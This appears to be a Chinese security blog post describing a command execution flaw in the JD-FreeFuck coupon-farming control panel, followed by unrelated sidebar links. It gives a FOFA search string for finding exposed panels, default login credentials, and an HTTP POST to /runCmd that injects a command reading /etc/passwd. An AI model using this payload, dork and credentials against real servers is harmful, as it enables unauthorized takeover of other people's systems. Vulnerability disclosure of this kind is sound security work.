当前位置:网站首页>JD-FreeFuck 京东薅羊毛控制面板 后台命令执行漏洞
JD-FreeFuck 京东薅羊毛控制面板 后台命令执行漏洞
2022-04-23 18:04:00 【孤桜懶契】
漏洞描述
i
JD-FreeFuck 存在后台命令执行漏洞,由于传参执行命令时没有对内容过滤,导致可以执行任意命令,控制服务器 项目地址: https://github.com/meselson/JD-FreeFuck
漏洞影响
s
JD-FreeFuck
空间测绘
d
FOFA:title="京东薅羊毛控制面板"
漏洞复现
- 访问后登录页面如下
- 默认账号
useradmin/supermanito
POST /runCmd HTTP/1.1
cmd=bash+jd.sh+%3Bcat /etc/passwd%3B+now&delay=500
个人博客
孤桜懶契:https://gylq.gitee.io/time
版权声明
本文为[孤桜懶契]所创,转载请带上原文链接,感谢
https://blog.csdn.net/qq_35938621/article/details/124356729
边栏推荐
- Remember using Ali Font Icon Library for the first time
- 2022 Jiangxi Photovoltaic Exhibition, China distributed Photovoltaic Exhibition, Nanchang solar energy utilization Exhibition
- Multi thread crawling Marco Polo network supplier data
- ES6
- Secure credit
- Classification of cifar100 data set based on convolutional neural network
- 2022 judgment questions and answers for operation of refrigeration and air conditioning equipment
- Generate verification code
- .104History
- I/O多路复用及其相关详解
猜你喜欢
2022江西光伏展,中国分布式光伏展会,南昌太阳能利用展
Romance in C language
Jenkspy package installation
Calculation of fishing net road density
re正则表达式
Cloud native Virtualization: building edge computing instances based on kubevirt
Cross domain settings of Chrome browser -- including new and old versions
2022 Jiangxi Photovoltaic Exhibition, China Distributed Photovoltaic Exhibition, Nanchang Solar Energy Utilization Exhibition
cv_ Solution of mismatch between bridge and opencv
[UDS unified diagnostic service] (Supplement) v. detailed explanation of ECU bootloader development points (2)
随机推荐
Qt读写XML文件(含源码+注释)
Click Cancel to return to the previous page and modify the parameter value of the previous page, let pages = getcurrentpages() let prevpage = pages [pages. Length - 2] / / the data of the previous pag
Docker installation MySQL
String function in MySQL
Refcell in rust
How to read literature
JS high frequency interview questions
Theory and practice of laser slam in dark blue College - Chapter 2 (odometer calibration)
Excel opens large CSV format data
Re regular expression
Data stream encryption and decryption of C
Yolov4 pruning [with code]
Arcpy adds fields and loop assignments to vector data
MySQL auto start settings start with systemctl start mysqld
positioner
Go language JSON package usage
SSD硬盘SATA接口和M.2接口区别(详细)总结
20222 return to the workplace
What are the relationships and differences between threads and processes
Using files to save data (C language)